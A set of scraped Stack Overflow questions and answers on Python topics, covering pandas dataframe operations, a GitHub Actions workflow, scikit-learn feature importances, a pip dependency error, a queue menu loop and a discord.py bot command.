Q: Compare elements in lists on 1 column rows and assign unique values in new column, Pandas I would like to compare elements in lists in 1 column and assign unique values that are on no other row in new column in the same Pandas df: Int.: data = {'object_1':[1, 3, 4, 5, 77], 'object_2':[1, 5, 100, 3, 4], "object_3": [1, 3, 4, 5, 5], "object_4": [1, 3, 5, 47, 48]} Out.: data = {'object_1':[1, 3, 4, 5, 77], 'object_2':[1, 5, 100, 3, 4], "object_3": [1, 3, 4, 5, 5], "object_4": [1, 3, 5, 47, 48], "unique_values": [[77], [100], [None], [47,48]], } Thanks. A: You can use isin and stack: data['unique_values'] = ([df.loc[~df[col].isin(df.set_index(col).stack()), col].tolist() for col in df.columns]) data: {'object_1': [1, 3, 4, 5, 77], 'object_2': [1, 5, 100, 3, 4], 'object_3': [1, 3, 4, 5, 5], 'object_4': [1, 3, 5, 47, 48], 'unique_values': [[77], [100], [], [47, 48]]} A: Here is a way using drop_duplicates() df.stack().drop_duplicates(keep=False).groupby(level=1).agg(list).to_dict() Output: {'object_1': [77], 'object_2': [100], 'object_4': [47, 48]}
Compare elements in lists on 1 column rows and assign unique values in new column, Pandas
I would like to compare elements in lists in 1 column and assign unique values that are on no other row in new column in the same Pandas df: Int.: data = {'object_1':[1, 3, 4, 5, 77], 'object_2':[1, 5, 100, 3, 4], "object_3": [1, 3, 4, 5, 5], "object_4": [1, 3, 5, 47, 48]} Out.: data = {'object_1':[1, 3, 4, 5, 77], 'object_2':[1, 5, 100, 3, 4], "object_3": [1, 3, 4, 5, 5], "object_4": [1, 3, 5, 47, 48], "unique_values": [[77], [100], [None], [47,48]], } Thanks.
[ "You can use isin and stack:\ndata['unique_values'] = ([df.loc[~df[col].isin(df.set_index(col).stack()), col].tolist()\n for col in df.columns])\n\ndata:\n{'object_1': [1, 3, 4, 5, 77],\n 'object_2': [1, 5, 100, 3, 4],\n 'object_3': [1, 3, 4, 5, 5],\n 'object_4': [1, 3, 5, 47, 48],\n 'unique_values': [[77], [100], [], [47, 48]]}\n\n", "Here is a way using drop_duplicates()\ndf.stack().drop_duplicates(keep=False).groupby(level=1).agg(list).to_dict()\n\nOutput:\n{'object_1': [77], 'object_2': [100], 'object_4': [47, 48]}\n\n" ]
[ 1, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074576366_pandas_python.txt
Q: How to create a new column with how many times a value in another variable repeats in python I am trying to create a new column in a dataframe in which I can count how many times a value in another variables. I want my outcome to be like the column "count" Product Count Apple 3 orange 2 Apple 3 orange 2 Apple 3 Pear 1 I have tried the following: df['Prodct'].value_counts() Hence, I have the list of the count for each product, but I don't know how to put it in the data frame how I stated before A: Is this what you're trying to achieve? import pandas as pd import numpy as np import random fruits = ['Apple', 'Orange', 'Banana', 'Kiwi', 'Mango'] # bootstrap fruits samples = np.random.choice(fruits, size=100, replace=True) df = pd.DataFrame({'fruit': samples}) print(df.head()) count_dict = df['fruit'].value_counts().to_dict() df['count'] = df['fruit'].map(count_dict) print('-------------') print(df.head()) The code above yields the following output: Before the modification: fruit 0 Kiwi 1 Orange 2 Banana 3 Orange 4 Apple After the modification: fruit count 0 Kiwi 28 1 Orange 20 2 Banana 19 3 Orange 20 4 Apple 18
How to create a new column with how many times a value in another variable repeats in python
I am trying to create a new column in a dataframe in which I can count how many times a value in another variables. I want my outcome to be like the column "count" Product Count Apple 3 orange 2 Apple 3 orange 2 Apple 3 Pear 1 I have tried the following: df['Prodct'].value_counts() Hence, I have the list of the count for each product, but I don't know how to put it in the data frame how I stated before
[ "Is this what you're trying to achieve?\nimport pandas as pd\nimport numpy as np\nimport random\n\nfruits = ['Apple', 'Orange', 'Banana', 'Kiwi', 'Mango']\n\n# bootstrap fruits\nsamples = np.random.choice(fruits, size=100, replace=True)\n\ndf = pd.DataFrame({'fruit': samples})\n\nprint(df.head())\n\ncount_dict = df['fruit'].value_counts().to_dict()\ndf['count'] = df['fruit'].map(count_dict)\n\nprint('-------------')\n\nprint(df.head())\n\nThe code above yields the following output:\nBefore the modification:\n fruit\n0 Kiwi\n1 Orange\n2 Banana\n3 Orange\n4 Apple\n\nAfter the modification:\n fruit count\n0 Kiwi 28\n1 Orange 20\n2 Banana 19\n3 Orange 20\n4 Apple 18\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074576265_dataframe_pandas_python.txt
Q: Avoid df.iterrow to drop dataframe rows within certain conditions I have a dataframe similar to this: import pandas as pd colA = ['a', 'a', 'a', 'a', 'b', 'b', 'b', 'b', 'c', 'c', 'c', 'c'] colB = [(21,1,2), (0,1,21), (2,1,21), (1,12,5), (21,1,0), (12,5,6), (18,7,14), (7,5,12), (14,7,18), (12,7,11), (11,7,12), (3,5,7)] df = pd.DataFrame(list(zip(colA, colB)), columns = ['colA', 'colB']) display(df) output: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (2, 1, 21) 3 a (1, 12, 5) 4 b (21, 1, 0) 5 b (12, 5, 6) 6 b (18, 7, 14) 7 b (7, 5, 12) 8 c (14, 7, 18) 9 c (12, 7, 11) 10 c (11, 7, 12) 11 c (3, 5, 7) I'd need to drop (or filter out) all the rows where, within the same value of colA, a value of colB in a row is equal to the reverse value of colB in another row. In the example provided: within colA='a' row 2 has colB=(2,1,21) which is the reverse of row 0 colB=(21,1,2) and thus should be dropped colA='b' row 4 has colB=(21,1,0) which is the reverse of row 1 colB=(0,1,21) but that's colA='a' so nothing to drop here within colA='c' row 10 has colB=(11,7,12) which is the reverse of row 9 colB=(12,7,11) and thus should be dropped Final results would something like: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (1, 12, 5) 3 b (21, 1, 0) 4 b (12, 5, 6) 5 b (18, 7, 14) 6 b (7, 5, 12) 7 c (14, 7, 18) 8 c (12, 7, 11) 9 c (3, 5, 7) Observations: Preferable to drop row on a duplicated dataframe and keep the original Very important: my real dataframe has shape (3millions, 11), so I am looking for an efficient way to do this, like .apply, lambda etc..I did this in the past with df.iterrows, it was already not the best way, my bad..now it's completely unfeasible Current df.iterrows solution: unique_df = df.copy() seen_a_b = set() for i, row in df.iterrows(): val_a = row['colA'] val_b = row['colB'] a_b = (val_a, val_b) a_revb = (val_a, val_b[::-1]) if a_b in seen_a_b: unique_df.drop(i, inplace=True) continue seen_a_b.add(a_b) seen_a_b.add(a_revb) A: Try this: df.groupby(['colA',df['colB'].map(lambda x: frozenset((x[0],x[-1])))],as_index=False).first() This solution creates a frozenset, or an immutable set that can be used as a groupby key. This, along with colA is used to get the first value of each group. We are only using the first and last value in colB, as the middle value is the same forward and backwards. Output: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (1, 12, 5) 3 b (21, 1, 0) 4 b (12, 5, 6) 5 b (18, 7, 14) 6 b (7, 5, 12) 7 c (14, 7, 18) 8 c (12, 7, 11) 9 c (3, 5, 7)
Avoid df.iterrow to drop dataframe rows within certain conditions
I have a dataframe similar to this: import pandas as pd colA = ['a', 'a', 'a', 'a', 'b', 'b', 'b', 'b', 'c', 'c', 'c', 'c'] colB = [(21,1,2), (0,1,21), (2,1,21), (1,12,5), (21,1,0), (12,5,6), (18,7,14), (7,5,12), (14,7,18), (12,7,11), (11,7,12), (3,5,7)] df = pd.DataFrame(list(zip(colA, colB)), columns = ['colA', 'colB']) display(df) output: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (2, 1, 21) 3 a (1, 12, 5) 4 b (21, 1, 0) 5 b (12, 5, 6) 6 b (18, 7, 14) 7 b (7, 5, 12) 8 c (14, 7, 18) 9 c (12, 7, 11) 10 c (11, 7, 12) 11 c (3, 5, 7) I'd need to drop (or filter out) all the rows where, within the same value of colA, a value of colB in a row is equal to the reverse value of colB in another row. In the example provided: within colA='a' row 2 has colB=(2,1,21) which is the reverse of row 0 colB=(21,1,2) and thus should be dropped colA='b' row 4 has colB=(21,1,0) which is the reverse of row 1 colB=(0,1,21) but that's colA='a' so nothing to drop here within colA='c' row 10 has colB=(11,7,12) which is the reverse of row 9 colB=(12,7,11) and thus should be dropped Final results would something like: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (1, 12, 5) 3 b (21, 1, 0) 4 b (12, 5, 6) 5 b (18, 7, 14) 6 b (7, 5, 12) 7 c (14, 7, 18) 8 c (12, 7, 11) 9 c (3, 5, 7) Observations: Preferable to drop row on a duplicated dataframe and keep the original Very important: my real dataframe has shape (3millions, 11), so I am looking for an efficient way to do this, like .apply, lambda etc..I did this in the past with df.iterrows, it was already not the best way, my bad..now it's completely unfeasible Current df.iterrows solution: unique_df = df.copy() seen_a_b = set() for i, row in df.iterrows(): val_a = row['colA'] val_b = row['colB'] a_b = (val_a, val_b) a_revb = (val_a, val_b[::-1]) if a_b in seen_a_b: unique_df.drop(i, inplace=True) continue seen_a_b.add(a_b) seen_a_b.add(a_revb)
[ "Try this:\ndf.groupby(['colA',df['colB'].map(lambda x: frozenset((x[0],x[-1])))],as_index=False).first()\n\nThis solution creates a frozenset, or an immutable set that can be used as a groupby key. This, along with colA is used to get the first value of each group. We are only using the first and last value in colB, as the middle value is the same forward and backwards.\nOutput:\n colA colB\n0 a (21, 1, 2)\n1 a (0, 1, 21)\n2 a (1, 12, 5)\n3 b (21, 1, 0)\n4 b (12, 5, 6)\n5 b (18, 7, 14)\n6 b (7, 5, 12)\n7 c (14, 7, 18)\n8 c (12, 7, 11)\n9 c (3, 5, 7)\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074575790_dataframe_pandas_python.txt
Q: Github action to execute a Python script that create a file, then commit and push this file My repo contains a main.py that generates a html map and save results in a csv. I want the action to: execute the python script (-> this seems to be ok) that the file generated would then be in the repo, hence having the file generated to be added, commited and pushed to the main branch to be available in the page associated with the repo. name: refresh map on: schedule: - cron: "30 11 * * *" #runs at 11:30 UTC everyday jobs: getdataandrefreshmap: runs-on: ubuntu-latest steps: - name: checkout repo content uses: actions/checkout@v3 # checkout the repository content to github runner. - name: setup python uses: actions/setup-python@v4 with: python-version: 3.8 #install the python needed - name: Install dependencies run: | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi - name: execute py script uses: actions/checkout@v3 run: | python main.py git config user.name github-actions git config user.email github-actions@github.com git add . git commit -m "crongenerated" git push The github-action does not pass when I include the 2nd uses: actions/checkout@v3 and the git commands. Thanks in advance for your help A: If you want to run a script, then you don't need an additional checkout step for that. There is a difference between steps that use workflows and those that execute shell scripts directly. You can read more about it here. In your configuration file, you kind of mix the two in the last step. You don't need an additional checkout step because the repo from the first step is still checked out. So you can just use the following workflow: name: refresh map on: schedule: - cron: "30 11 * * *" #runs at 11:30 UTC everyday jobs: getdataandrefreshmap: runs-on: ubuntu-latest steps: - name: checkout repo content uses: actions/checkout@v3 # checkout the repository content to github runner. - name: setup python uses: actions/setup-python@v4 with: python-version: 3.8 #install the python needed - name: Install dependencies run: | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi - name: execute py script run: | python main.py git config user.name github-actions git config user.email github-actions@github.com git add . git commit -m "crongenerated" git push I tested it with a dummy repo and everything worked.
Github action to execute a Python script that create a file, then commit and push this file
My repo contains a main.py that generates a html map and save results in a csv. I want the action to: execute the python script (-> this seems to be ok) that the file generated would then be in the repo, hence having the file generated to be added, commited and pushed to the main branch to be available in the page associated with the repo. name: refresh map on: schedule: - cron: "30 11 * * *" #runs at 11:30 UTC everyday jobs: getdataandrefreshmap: runs-on: ubuntu-latest steps: - name: checkout repo content uses: actions/checkout@v3 # checkout the repository content to github runner. - name: setup python uses: actions/setup-python@v4 with: python-version: 3.8 #install the python needed - name: Install dependencies run: | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi - name: execute py script uses: actions/checkout@v3 run: | python main.py git config user.name github-actions git config user.email github-actions@github.com git add . git commit -m "crongenerated" git push The github-action does not pass when I include the 2nd uses: actions/checkout@v3 and the git commands. Thanks in advance for your help
[ "If you want to run a script, then you don't need an additional checkout step for that. There is a difference between steps that use workflows and those that execute shell scripts directly. You can read more about it here.\nIn your configuration file, you kind of mix the two in the last step. You don't need an additional checkout step because the repo from the first step is still checked out. So you can just use the following workflow:\nname: refresh map\n\non:\n schedule:\n - cron: \"30 11 * * *\" #runs at 11:30 UTC everyday\n\njobs:\n getdataandrefreshmap:\n runs-on: ubuntu-latest\n steps:\n - name: checkout repo content\n uses: actions/checkout@v3 # checkout the repository content to github runner.\n - name: setup python\n uses: actions/setup-python@v4\n with:\n python-version: 3.8 #install the python needed\n - name: Install dependencies\n run: |\n if [ -f requirements.txt ]; then pip install -r requirements.txt; fi\n - name: execute py script\n run: |\n python main.py\n git config user.name github-actions\n git config user.email github-actions@github.com\n git add .\n git commit -m \"crongenerated\"\n git push\n\n\nI tested it with a dummy repo and everything worked.\n" ]
[ 3 ]
[]
[]
[ "github_actions", "python" ]
stackoverflow_0074575744_github_actions_python.txt
Q: Random Forest Classifier: Set feature importances? On a RFC model, I am trying to figure out how the feature importances change my classification when i am perturbing my data, like features(no perturbation)= features(perturbed data)-features(perturbation) Then using the features(no perturbation) on my already fit model. Do you if it is possible to manually set or change the feature importances of an RFC model ? I tried looking for but no results. Thank you. A: The general convention in scikit-learn code is that attributes that are inferred from your data / training end with _. feature_importances_ attributes respects that convention as well. They represent impurity-based importances and they are computed / inferred from your training set statistics. You have the option to act on the weight you give to the different samples through sample_weight argument as well as weighting your classes through class_weight parameter.
Random Forest Classifier: Set feature importances?
On a RFC model, I am trying to figure out how the feature importances change my classification when i am perturbing my data, like features(no perturbation)= features(perturbed data)-features(perturbation) Then using the features(no perturbation) on my already fit model. Do you if it is possible to manually set or change the feature importances of an RFC model ? I tried looking for but no results. Thank you.
[ "The general convention in scikit-learn code is that attributes that are inferred from your data / training end with _. feature_importances_ attributes respects that convention as well. They represent impurity-based importances and they are computed / inferred from your training set statistics.\nYou have the option to act on the weight you give to the different samples through sample_weight argument as well as weighting your classes through class_weight parameter.\n" ]
[ 0 ]
[]
[]
[ "machine_learning", "python", "random_forest", "scikit_learn" ]
stackoverflow_0074575103_machine_learning_python_random_forest_scikit_learn.txt
Q: ERROR: Could not find a version that satisfies the requirement setuptools_scm<3,>=4.1.2 I'm trying to install djangular-serve in my project but I'm unsure what version of setuptools_Scm it's asking for. Using cached djangular-serve-2.1.0.tar.gz (34 kB) Installing build dependencies ... error error: subprocess-exited-with-error × pip subprocess to install build dependencies did not run successfully. │ exit code: 1 ╰─> [4 lines of output] Collecting setuptools>=49.6.0 Using cached setuptools-65.6.3-py3-none-any.whl (1.2 MB) ERROR: Could not find a version that satisfies the requirement setuptools_scm<3,>=4.1.2 (from versions: 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.4.0, 1.4.1, 1.5.0, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.7.0, 1.8.0, 1.9.0, 1.10.0, 1.10.1, 1.11.0, 1.11.1, 1.13.0, 1.13.1, 1.14.0rc1, 1.14.0, 1.15.0rc1, 1.15.0, 1.15.1rc1, 1.15.4, 1.15.5, 1.15.6, 1.15.7, 1.16.0, 1.16.1, 1.16.2, 1.17.0, 2.0.0, 2.1.0, 3.0.0, 3.0.1, 3.0.2, 3.0.4, 3.0.5, 3.0.6, 3.1.0, 3.2.0, 3.3.1, 3.3.2, 3.3.3, 3.4.0, 3.4.1, 3.4.2, 3.4.3, 3.5.0, 4.0.0, 4.1.0, 4.1.1, 4.1.2, 5.0.0, 5.0.1, 5.0.2, 6.0.0, 6.0.1, 6.1.0.dev0, 6.1.0, 6.1.1, 6.2.0, 6.3.0, 6.3.1, 6.3.2, 6.4.0, 6.4.1, 6.4.2, 7.0.0, 7.0.1, 7.0.2, 7.0.3, 7.0.4, 7.0.5) ERROR: No matching distribution found for setuptools_scm<3,>=4.1.2 [end of output] note: This error originates from a subprocess, and is likely not a problem with pip. error: subprocess-exited-with-error I'm confused, how can the version be greater than 4.1.2 but less than 3? Do I need to fix the setup? How do I download the package and do that if I need to fix it? A: This is a bug in djangular-serve in pyproject.toml. Please report the bug. The fact that nobody reported the bug in two years suggests the package is not very popular among users.
ERROR: Could not find a version that satisfies the requirement setuptools_scm<3,>=4.1.2
I'm trying to install djangular-serve in my project but I'm unsure what version of setuptools_Scm it's asking for. Using cached djangular-serve-2.1.0.tar.gz (34 kB) Installing build dependencies ... error error: subprocess-exited-with-error × pip subprocess to install build dependencies did not run successfully. │ exit code: 1 ╰─> [4 lines of output] Collecting setuptools>=49.6.0 Using cached setuptools-65.6.3-py3-none-any.whl (1.2 MB) ERROR: Could not find a version that satisfies the requirement setuptools_scm<3,>=4.1.2 (from versions: 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.4.0, 1.4.1, 1.5.0, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.7.0, 1.8.0, 1.9.0, 1.10.0, 1.10.1, 1.11.0, 1.11.1, 1.13.0, 1.13.1, 1.14.0rc1, 1.14.0, 1.15.0rc1, 1.15.0, 1.15.1rc1, 1.15.4, 1.15.5, 1.15.6, 1.15.7, 1.16.0, 1.16.1, 1.16.2, 1.17.0, 2.0.0, 2.1.0, 3.0.0, 3.0.1, 3.0.2, 3.0.4, 3.0.5, 3.0.6, 3.1.0, 3.2.0, 3.3.1, 3.3.2, 3.3.3, 3.4.0, 3.4.1, 3.4.2, 3.4.3, 3.5.0, 4.0.0, 4.1.0, 4.1.1, 4.1.2, 5.0.0, 5.0.1, 5.0.2, 6.0.0, 6.0.1, 6.1.0.dev0, 6.1.0, 6.1.1, 6.2.0, 6.3.0, 6.3.1, 6.3.2, 6.4.0, 6.4.1, 6.4.2, 7.0.0, 7.0.1, 7.0.2, 7.0.3, 7.0.4, 7.0.5) ERROR: No matching distribution found for setuptools_scm<3,>=4.1.2 [end of output] note: This error originates from a subprocess, and is likely not a problem with pip. error: subprocess-exited-with-error I'm confused, how can the version be greater than 4.1.2 but less than 3? Do I need to fix the setup? How do I download the package and do that if I need to fix it?
[ "This is a bug in djangular-serve in pyproject.toml. Please report the bug. The fact that nobody reported the bug in two years suggests the package is not very popular among users.\n" ]
[ 0 ]
[]
[]
[ "django", "djangular", "pip", "python" ]
stackoverflow_0074576627_django_djangular_pip_python.txt
Q: If loop in queue keeps repeating # creating menu def menu(): print("What do you want to do:") print("1)Push") print("2)Pop") print("3)Display") print("4)Quit") choice = int(input("Make a selection: ")) return choice # creating a queue with a list def create_queue(): # creating a queue queue = [] while menu() > 0 & menu() < 5: if menu() == 1: print("You choose: Push") num_input = int(input("How many items do you want to enter: ")) for i in range(num_input): queue.append(input("Enter items: ")) elif menu() == 2: print("You choose: Pop") # making sure queue is not empty if len(queue) == 0: print("Empty, nothing to get rid of.") return else: print("Popping item out") queue.pop(0) elif menu() == 3: print("You choose: Display") print(queue) elif menu() == 4: print("You chose: Quit") return else: print("Not a choice") return create_queue() This is my code above, every time I run it, it would keep asking what I want to do, this is what I mean when it keeps repeating: What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 You choose: Push How many items do you want to enter: I have tried putting user choice in the loop but it would just get stuck in one choice instead of looping back out. I just want it to ask once and then afterwards, loop back out. Where did I mess up and what can I change to fix this? A: In your code, you are calling the 'menu()' function multiple times. while menu() > 0 & menu() < 5: if menu() == 1: Save it in a variable: choice = None while choice > 0 and choice < 5: choice = menu() if choice == 1: # Etc. Hope this resolves your issue!
If loop in queue keeps repeating
# creating menu def menu(): print("What do you want to do:") print("1)Push") print("2)Pop") print("3)Display") print("4)Quit") choice = int(input("Make a selection: ")) return choice # creating a queue with a list def create_queue(): # creating a queue queue = [] while menu() > 0 & menu() < 5: if menu() == 1: print("You choose: Push") num_input = int(input("How many items do you want to enter: ")) for i in range(num_input): queue.append(input("Enter items: ")) elif menu() == 2: print("You choose: Pop") # making sure queue is not empty if len(queue) == 0: print("Empty, nothing to get rid of.") return else: print("Popping item out") queue.pop(0) elif menu() == 3: print("You choose: Display") print(queue) elif menu() == 4: print("You chose: Quit") return else: print("Not a choice") return create_queue() This is my code above, every time I run it, it would keep asking what I want to do, this is what I mean when it keeps repeating: What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 You choose: Push How many items do you want to enter: I have tried putting user choice in the loop but it would just get stuck in one choice instead of looping back out. I just want it to ask once and then afterwards, loop back out. Where did I mess up and what can I change to fix this?
[ "In your code, you are calling the 'menu()' function multiple times.\nwhile menu() > 0 & menu() < 5:\n if menu() == 1:\n\nSave it in a variable:\nchoice = None\nwhile choice > 0 and choice < 5:\n choice = menu()\n if choice == 1:\n# Etc.\n\nHope this resolves your issue!\n" ]
[ 0 ]
[]
[]
[ "data_structures", "loops", "python", "queue" ]
stackoverflow_0074576720_data_structures_loops_python_queue.txt
Q: Edit Discord message with the before content replaced I'm currently developing a Discord bot with discord.py. I made a command named underscored and the goal is to edit each message the bot sends with just replacing the spaces by underscores. Here's an example: User: /test Bot: This is a test command. User: /underscored User: /test Bot: This_is_a_test_command. So here's the command: @bot.command() async def underscored(ctx): underscored == True And on the other hand, here's the on_message event I made: @bot.event async def on_message(message, before): if underscored == True: await message.edit(content=before.replace(' ', '_')) Now, here's the error I'm getting: Traceback (most recent call last): File "C:\Users\cold\AppData\Local\Programs\Python\Python39\lib\site-packages\discord\client.py", line 343, in _run_event await coro(*args, **kwargs) TypeError: on_message() missing 1 required positional argument: 'before' Can someone help me? I quite don't understand what's going on. A: You get that error because on_message event takes only one argument, which is the message (discord.Message class). You can refere the documentation here You will have to implement it to every command manually, instead of using the on_message event # global variable that can be accessed by every command underscored_s = False @bot.command() async def underscored(ctx): global underscored_s # toggle underscored status, turn on if off, turn off if on if underscored_s is True: underscored_s = False await ctx.send("changed underscored to False") else: underscored_s = True await ctx.send("changed underscored to True") @bot.command() async def on_message(ctx): global underscored_s message = "This is a test command." if underscored_s is True: await ctx.send(message) else: await ctx.send(message.replace(' ', '_')) on_message event is to be used when a new message is sent by a user, to process it by the bot. I dont think that it can be used to edit the message sent by the bot as a reply to the on_message event
Edit Discord message with the before content replaced
I'm currently developing a Discord bot with discord.py. I made a command named underscored and the goal is to edit each message the bot sends with just replacing the spaces by underscores. Here's an example: User: /test Bot: This is a test command. User: /underscored User: /test Bot: This_is_a_test_command. So here's the command: @bot.command() async def underscored(ctx): underscored == True And on the other hand, here's the on_message event I made: @bot.event async def on_message(message, before): if underscored == True: await message.edit(content=before.replace(' ', '_')) Now, here's the error I'm getting: Traceback (most recent call last): File "C:\Users\cold\AppData\Local\Programs\Python\Python39\lib\site-packages\discord\client.py", line 343, in _run_event await coro(*args, **kwargs) TypeError: on_message() missing 1 required positional argument: 'before' Can someone help me? I quite don't understand what's going on.
[ "You get that error because on_message event takes only one argument, which is the message (discord.Message class). You can refere the documentation here\nYou will have to implement it to every command manually, instead of using the on_message event\n# global variable that can be accessed by every command\nunderscored_s = False\n\n@bot.command()\nasync def underscored(ctx):\n global underscored_s\n\n # toggle underscored status, turn on if off, turn off if on\n if underscored_s is True:\n underscored_s = False\n await ctx.send(\"changed underscored to False\")\n else:\n underscored_s = True\n await ctx.send(\"changed underscored to True\")\n\n@bot.command()\nasync def on_message(ctx):\n global underscored_s\n\n message = \"This is a test command.\"\n if underscored_s is True:\n await ctx.send(message)\n else:\n await ctx.send(message.replace(' ', '_'))\n\non_message event is to be used when a new message is sent by a user, to process it by the bot. I dont think that it can be used to edit the message sent by the bot as a reply to the on_message event\n" ]
[ 1 ]
[]
[]
[ "bots", "discord", "discord.py", "python" ]
stackoverflow_0074531641_bots_discord_discord.py_python.txt